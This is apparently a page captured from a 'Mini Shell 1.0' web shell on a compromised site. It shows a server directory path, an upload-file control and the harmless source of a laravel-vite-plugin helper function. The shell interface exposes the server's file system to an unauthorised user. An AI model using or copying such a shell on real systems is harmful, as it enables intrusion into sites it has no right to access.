HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/negocios.lapieza.do/node_modules/laravel-vite-plugin/inertia-helpers/
Upload File :
Current File : /var/www/negocios.lapieza.do/node_modules/laravel-vite-plugin/inertia-helpers/index.js
export async function resolvePageComponent(path, pages) {
    const page = pages[path];
    if (typeof page === 'undefined') {
        throw new Error(`Page not found: ${path}`);
    }
    return typeof page === 'function' ? page() : page;
}